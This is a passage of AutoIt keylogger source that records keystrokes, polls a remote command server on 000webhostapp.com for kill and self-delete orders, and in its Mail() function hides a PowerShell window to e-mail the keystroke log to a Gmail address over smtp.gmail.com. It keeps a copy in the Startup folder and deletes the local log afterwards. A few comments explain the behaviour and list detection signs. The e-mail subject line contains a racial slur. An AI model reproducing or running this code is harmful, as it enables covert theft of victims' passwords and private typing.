- If _IsPressed('BE',$Dllcall) Then
- _LogKeyPress(".")
- EndIf
- If _IsPressed('BF',$Dllcall) Then
- _LogKeyPress("/")
- EndIf
- If _IsPressed('DB',$Dllcall) Then
- _LogKeyPress("[")
- EndIf
- If _IsPressed('DC',$Dllcall) Then
- _LogKeyPress("\")
- EndIf
- If _IsPressed('DD',$Dllcall) Then
- _LogKeyPress("]")
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- Mail()
- Send("=")
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "dumpkeyscan" Then
- Send("=")
- Mail()
- EndIf
- $num = $num + 1
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- ProcessClose($exename)
- Exit 0
- EndIf
- ;
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- FileDelete(@StartupDir & "/" & $exename)
- ProcessClose($exename)
- EndIf
- ;Global $filecontent = FileRead($log)
- ;Global $mouseposition = MouseGetPos()
- ;Sleep(300000)
- ;Global $mousepositios = MouseGetPos()
- ;if $mouseposition == $mousepositios Then
- ; Run("cmd.exe")
- ; Sleep(100)
- ;Send("Start Powershell")
- ;Send("{ENTER}")
- ;Sleep(3000)
- ;Send("Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
- ;Send($filecontent);
- ;FileClose($file)
- ;Send(" -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
- ;Send(" -Attachments ")
- ;Send(@scriptdir)
- ;Send("/log/logfiles")
- ;Send($date)
- ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
- ;Send("{ENTER}")
- ;Sleep(2000)
- ;Send("pass");
- ;Send("{ENTER}")
- ;FileOpen($log)
- ;Sleep(30000)
- ; EndIf
- ;=======================================================================================
- WEnd
- ; Mail(): exfiltrates the keystroke log by e-mail. Takes no parameters.
- ; Two mouse positions are sampled 300 ms apart; when they compare equal, a PowerShell
- ; window is started and hidden, the log file handle is closed, and a Send-MailMessage
- ; command attaching <script dir>/log/logfiles<date>.htm is delivered with ControlSend.
- ; The credential prompt is found by its Portuguese window title, hidden and answered.
- ; Inside that branch the server is polled for "kill", "obliterate" and "returnzero".
- ; After the If, on every pass, the log file is deleted, the Startup-folder copy is
- ; started and this process exits.
- ; Detection: hidden powershell.exe child of this binary, outbound SMTP submission to
- ; smtp.gmail.com:587 from a workstation, and deletion of the .htm log straight after.
- Func Mail()
- while(true)
- Global $mouseposition = MouseGetPos()
- Sleep(300)
- Global $mousepositios = MouseGetPos()
- if $mouseposition == $mousepositios Then
- Run("powershell.exe")
- WinWait("Windows PowerShell")
- WinSetState("Windows PowerShell", "", @SW_HIDE)
- ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
- ;Send($filecontent);
- FileClose($file)
- ControlSend("Windows PowerShell","", "","-SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
- ControlSend("Windows PowerShell","", ""," -Attachments ")
- ControlSend("Windows PowerShell","", "",@scriptdir)
- ControlSend("Windows PowerShell","", "","/log/logfiles")
- ControlSend("Windows PowerShell","", "",$date)
- ControlSend("Windows PowerShell","", "",".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
- ControlSend("Windows PowerShell","", "","{ENTER}")
- WinWait("Solicitação de credenciais do Windows PowerShell")
- WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
- ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
- ;Send("{ENTER}")
- ;FileOpen($log)
- ; "kill": close helper processes and exit, leaving files in place.
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- ProcessClose($exename)
- Exit 0
- EndIf
- ;
- ; "obliterate": additionally delete the Startup-folder copy.
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
- ProcessClose("cmd.exe")
- ProcessClose("powershell.exe")
- FileDelete(@StartupDir & "/" & $exename)
- ProcessClose($exename)
- EndIf
- Sleep(10000)
- ProcessClose("cmd.exe")
- ProcessClose("Powershell.exe")
- If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
- $stage = 0;
- EndIf
- Sleep(30000)
- EndIf
- ; Local log is removed and the Startup-folder copy is started before this process exits.
- FileDelete(@scriptdir & "/log/logfiles" & $date & ".htm")
- Run( @startupdir & "/" & $exename)
- Exit 0
- WEnd
- EndFunc
- ;WEnd
- ;WEnd